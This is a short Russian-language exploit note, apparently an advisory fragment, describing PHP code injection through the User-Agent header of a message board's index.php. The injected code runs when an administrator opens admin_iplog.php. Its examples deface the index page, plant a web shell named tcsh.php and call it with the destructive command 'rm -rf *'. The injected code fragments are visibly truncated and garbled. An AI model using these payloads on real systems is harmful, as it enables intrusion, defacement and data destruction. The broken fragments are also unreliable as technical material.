e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent:
Когда админ выховет admin_iplog.php ваш php код выполнится.
пример для kodsweb'ов:
1. ../index.html" ); ?>
задефейсит индексную страничку
2. ' > ../../tcsh.php" ); ?>
создаст tcsh.php в директории wwwroot с правами httpd. затем всего лишь вызываем следующий URL: http://hostname/tcsh.php?cmd=rm -rf *
После инъекции кода, админ должен вызвать скрипт admin_iplog.php.
